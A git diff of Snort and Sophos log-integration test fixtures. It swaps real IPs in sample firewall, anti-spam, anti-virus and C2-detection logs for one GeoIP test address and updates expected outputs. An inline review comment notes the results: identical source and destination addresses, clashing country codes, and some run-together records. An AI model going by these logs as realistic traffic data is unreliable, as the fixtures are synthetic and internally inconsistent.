"name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "104.5.30.130", - "ip": "104.5.30.130" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:tgCGB6IwKNaKy9rAfETAo1iSN6c=", + "community_id": "1:ae//KI+huidgn9Nxeaibd8SUiVA=", "transport": "icmp", "type": "ipv4", "direction": "external" 
@@ -261,14 +259,13 @@ }, "related": { "ip": [ - "104.5.30.130", - "104.5.30.1" + "175.16.199.1" ] }, "event": { "severity": 0, - "ingested": "2021-09-20T12:26:55.088065287Z", - "original": "09/03/21-16:29:03.494387 ,1,477,3,\"ICMP Packet\",ICMP,104.5.30.130,,104.5.30.1,,40546,,0,alert,Allow", + "ingested": "2021-12-09T13:44:51.135058700Z", + "original": "09/03/21-16:29:03.494387 ,1,477,3,\"ICMP Packet\",ICMP,175.16.199.1,,175.16.199.1,,40546,,0,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T16:29:03.494-06:00", "kind": "alert", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log index d5ec77c0258..b242df14f24 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log @@ -1,3 +1,3 @@ Sep 5 16:05:26 dev snort: [1:1000017:0] UDP Connection [Classification: Misc activity] [Priority: 3] {UDP} 10.150.10.44:55776 -> 10.25.10.22:32414 Sep 5 16:05:26 dev snort: [1:1000016:0] TCP Connection [Priority: 3] {TCP} 10.50.20.59:58720 -> 10.50.10.190:22 -Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -> 142.251.33.14 \ No newline at end of file +Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -> 175.16.199.1 \ No newline at end of file diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json index 598a056a102..ea2b979c40d 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json 
@@ -47,7 +47,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:56.913274558Z", + "ingested": "2021-12-09T13:44:51.600089400Z", "original": "Sep 5 16:05:26 dev snort: [1:1000017:0] UDP Connection [Classification: Misc activity] [Priority: 3] {UDP} 10.150.10.44:55776 -\u003e 10.25.10.22:32414", "timezone": "America/Chicago", "created": "2021-09-05T16:05:26.000-05:00", @@ -106,7 +106,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:56.913284132Z", + "ingested": "2021-12-09T13:44:51.600098200Z", "original": "Sep 5 16:05:26 dev snort: [1:1000016:0] TCP Connection [Priority: 3] {TCP} 10.50.20.59:58720 -\u003e 10.50.10.190:22", "timezone": "America/Chicago", "created": "2021-09-05T16:05:26.000-05:00", @@ -125,22 +125,24 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "142.251.33.14", - "ip": "142.251.33.14" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "description": "Pinging...", @@ -156,7 +158,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AxRhCEROBWkzOLpDpKAkFeQT7/w=", + "community_id": "1:AwywM3uuS+luH6U/hUKtj2x2LWU=", "transport": "icmp", "type": "ipv4", "direction": "outbound" 
@@ -174,13 +176,13 @@
 "related": {
 "ip": [
 "10.50.10.88",
-"142.251.33.14"
+"175.16.199.1"
 ]
 },
 "event": {
 "severity": 3,
-"ingested": "2021-09-20T12:26:56.913287234Z",
-"original": "Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -\u003e 142.251.33.14",
+"ingested": "2021-12-09T13:44:51.600104Z",
+"original": "Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -\u003e 175.16.199.1",
 "timezone": "America/Chicago",
 "created": "2021-09-05T16:02:55.000-05:00",
 "kind": "alert",
diff --git a/packages/snort/manifest.yml b/packages/snort/manifest.yml
index 169dc60cd91..1206d23f2cc 100644
--- a/packages/snort/manifest.yml
+++ b/packages/snort/manifest.yml
@@ -1,6 +1,6 @@
 name: snort
 title: Snort
-version: 0.1.0
+version: 0.1.1
 release: experimental
 description: Collect logs from Snort with Elastic Agent.
 type: integration
diff --git a/packages/sophos/_dev/deploy/docker/sample_logs/sophos-xg.log b/packages/sophos/_dev/deploy/docker/sample_logs/sophos-xg.log
index 85a69585c91..d619a45bbd8 100644
--- a/packages/sophos/_dev/deploy/docker/sample_logs/sophos-xg.log
+++ b/packages/sophos/_dev/deploy/docker/sample_logs/sophos-xg.log
@@ -1,7 +1,7 @@ <30>device="SFW" date=2020-05-18 time=14:38:48 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041101618035 log_type="Anti-Spam" log_component="SMTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="firewall@firewallgate.com" to_email_address="Sysadmin@elasticuser.com" email_subject="*ALERT* Sophos XG Firewall" mailid="qkW2Y6-LxBk6U-vH-1590055245" mailsize=19728 spamaction="QUEUED" reason="Email has been accepted by Device and queued for scanning." src_domainname="elasticuser.com" dst_domainname="" src_ip="" src_country_code="" dst_ip="" dst_country_code="" protocol="TCP" src_port=0 dst_port=0 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" -<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid 
- TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=77.72.3.56 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL" +<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." 
src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=175.16.199.1 src_country_code=GBR dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL" <30>device="SFW" date=2017-01-31 time=18:34:41 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=041113413005 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Spam" status="" priority=Warning fw_rule_id=0 user_name="gaurav" av_policy_name="Gaurav123" from_email_address="gaurav1@iview.com" to_email_address=" gaurav2@iview.com" email_subject="RPD Spam Test: Spam" mailid="" mailsize=405 spamaction="Accept" reason="" src_domainname=" iview.com" dst_domainname="" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol="TCP" src_port=22420 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam" <30>device="SFW" date=2018-06-06 time=11:10:11 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041114413006 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Probable Spam" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="rule 8" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman.local" email_subject="RPD Spam test: Bulk" mailid="" mailsize=439 spamaction="Drop" reason="Mail detected as OUTBOUND PROBABLE SPAM." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=58043 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam" <30>device="SFW" date=2018-06-06 time=12:50:07 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041121613009 log_type="Anti-Spam" log_component="SMTP" log_subtype="DLP" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="postman" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman. 
local" email_subject="Fwd: TESt" mailid="c0000002-1528269606" mailsize=5041 spamaction="DROP" reason="Email containing confidential data detected. Relevant Data Protection Policy applied." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60134 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="DLP" 
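Review bot: In the rewritten `14:38:51` anti-spam record, `src_ip` and `dst_ip` are now both `175.16.199.1` while the raw `src_country_code=GBR` and `dst_country_code=DEU` are left untouched, so the sample describes mail delivered from an address to itself with two different countries attached, and any GeoIP enrichment the pipeline adds for that address will disagree with at least one of them. Using a second address from the supported subset for the destination keeps the two endpoints distinguishable, e.g. `src_ip=175.16.199.1 src_country_code=GBR dst_ip=<second-supported-address> dst_country_code=DEU`. The same one-address-for-every-field pattern continues in the next hunk, which runs past this chunk: RFC 1918 sources such as `172.16.34.24` that did not need replacing also become `175.16.199.1`, and the IPSec record's `localnetwork="172.17.32.0/19"` becomes `localnetwork="175.16.199.1/19"`, a host address in a field that previously held a network prefix.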
@@ -9,39 +9,39 @@ <30>device="SFW" date=2018-06-06 time=12:53:39 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041123413012 log_type="Anti-Spam" log_component="SMTP" log_subtype="Dos" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="" to_email_address="" email_subject="" mailid="" mailsize=0 spamaction="TMPREJECT" reason="SMTP DoS" src_domainname="" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60392 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-06 time=12:56:53 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041102413014 log_type="Anti-Spam" log_component="SMTP" log_subtype="Denied" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="postman" from_email_address="pankhil1@postman.local" to_email_address="pankhil@postman. local" email_subject="Fwd: test sand" mailid="c0000008-1528270010" mailsize=419835 spamaction="DROP" reason="Email is marked Malicious by Sophos Sandstorm." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60608 dst_port=25 sent_bytes=0 recv_bytes=0 <30>device="SFW" date=2017-01-31 time=18:31:11 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=041207414001 log_type="Anti-Spam" log_component="POP3" log_subtype="Spam" status="" priority=Warning fw_rule_id=0 user_name="gaurav" av_policy_name="GauravPatel" from_email_address="gaurav1@iview.com" to_email_address="gaurav2@iview. 
com" email_subject="RPD Spam Test: Spam" mailid="<2a2dd5d4-1a30-617b-27b1-7961ad07cf07@iview.com>" mailsize=574 spamaction="Accept" reason="" src_domainname=" iview.com" dst_domainname="iview.com" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol="TCP" src_port=22333 dst_port=110 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" -<30>device="SFW" date=2020-05-18 time=14:38:33 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="Sandstorm" url="http://sophostest.com/Sandstorm/SBTestFile1.pdf" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.93 dst_country_code=USA protocol="TCP" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 -<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="EICAR-AV-Test" url="http://sophostest.com/eicar/index.html" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.18 dst_country_code=USA protocol="TCP" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 -<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" 
from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=82.165.194.211 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" -<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=23.254.247.78 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" +<30>device="SFW" date=2020-05-18 time=14:38:33 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="Sandstorm" url="http://sophostest.com/Sandstorm/SBTestFile1.pdf" domainname="sophostest.com" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 +<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" 
device_name="XG230" device_id=1234567890123456 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="EICAR-AV-Test" url="http://sophostest.com/eicar/index.html" domainname="sophostest.com" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 +<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" +<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=175.16.199.1 src_country_code=USA 
dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" <30>device="SFW" date=2018-06-06 time=10:51:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036106211001 log_type="Anti-Virus" log_component="POPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="pankhil@postman.local" subject="EICAR" mailid="" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56653 dst_port=995 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-06 time=10:58:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036206212001 log_type="Anti-Virus" log_component="IMAPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="ganga@postman.local" subject="EICAR test email" mailid="<2ca37b7c-e93a-743a-99c4-a0796f0bbb79@postman.local>" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56632 dst_port=993 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-21 time=19:50:23 timezone="CEST" device_name="SF01V" device_id=SFDemo-2df0960 log_id=031006209001 log_type="Anti-Virus" log_component="FTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" virus="EICAR-AV-Test" FTP_url="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" FTP_direction="Upload" filename=" /home/ftp-user/ta_test_file_1ta-cl1-46" file_size=0 file_path="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" 
ftpcommand="STOR" src_ip=10.146.13.49 src_country_code=R1 dst_ip=10.8.142.181 dst_country_code=R1 protocol="TCP" src_port=39910 dst_port=21 dstdomain="" sent_bytes=0 recv_bytes=0 <30>device="SFW" date=2018-06-21 time=19:50:48 timezone="CEST" device_name="SF01V" device_id=SFDemo-2df0960 log_id=031001609002 log_type="Anti-Virus" log_component="FTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=0 user_name="" virus="" FTP_url="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" FTP_direction="Download" filename="/home/ftp-user /ta_test_file_1ta-cl1-46" file_size=19926248 file_path="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" ftpcommand="RETR" src_ip=10.146.13.49 src_country_code= dst_ip=10.8.142.181 dst_country_code= protocol="TCP" src_port=39936 dst_port=21 dstdomain="" sent_bytes=0 recv_bytes=19926248 -<30>device="SFW" date=2017-01-31 time=18:44:31 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=086304418010 log_type="ATP" log_component="Firewall" log_subtype="Drop" priority=Warning user_name="jsmith" protocol="TCP" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=46.161.30.47 url=46.161.30.47 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" -<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57579 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" -<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=086504418010 log_type="ATP" log_component="Web" 
log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57540 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" -<30>device="SFW" date=2018-06-05 time=08:49:00 timezone="BST" device_name="XG310" device_id=C30006T22TGR89B log_id=086320518009 log_type="ATP" log_component="Firewall" log_subtype="Alert" priority=Notice user_name="" protocol="ICMP" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=82.211.30.202 url=82.211.30.202 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" -<30>device="SFW" date=2017-01-31 time=14:03:33 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="jsmith" user_gp="Open Group" iap=1 category="Entertainment" category_type="Unproductive" url="https://r8---sn-ci5gup-qxas.googlevideo.com/" contenttype="" override_token="" httpresponsecode="" src_ip=10.198.47.71 dst_ip=182.79.221.19 protocol="TCP" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname="" reason="" -<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=5.5.5.15 dst_ip=216.58.197.44 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 
domain=hanuman.com exceptions= activityname="" -<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=5.5.5.15 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message="" -<30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.10 dst_ip=13.79.168.201 protocol="TCP" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions="" activityname="" reason="" user_agent="" status_code="400" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=80042000 application="" app_is_cloud=0 override_name="" override_authorizer="" -<30>device="SFW" date=2020-05-18 time=14:38:52 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=51 user_name="" user_gp="" iap=2 category="IPAddress" category_type="Acceptable" url="https://40.90.137.127/" contenttype="" override_token="" httpresponsecode="" 
src_ip=172.16.34.15 dst_ip=40.90.137.127 protocol="TCP" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=40.90.137.127 exceptions="" activityname="" reason="" user_agent="" status_code="200" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=642960832 application="" app_is_cloud=0 override_name="" override_authorizer="" -<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.15 dst_ip=91.228.167.133 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2017-01-31 time=18:44:31 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=086304418010 log_type="ATP" log_component="Firewall" log_subtype="Drop" priority=Warning user_name="jsmith" protocol="TCP" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype="Standard" login_user="" process_user="" 
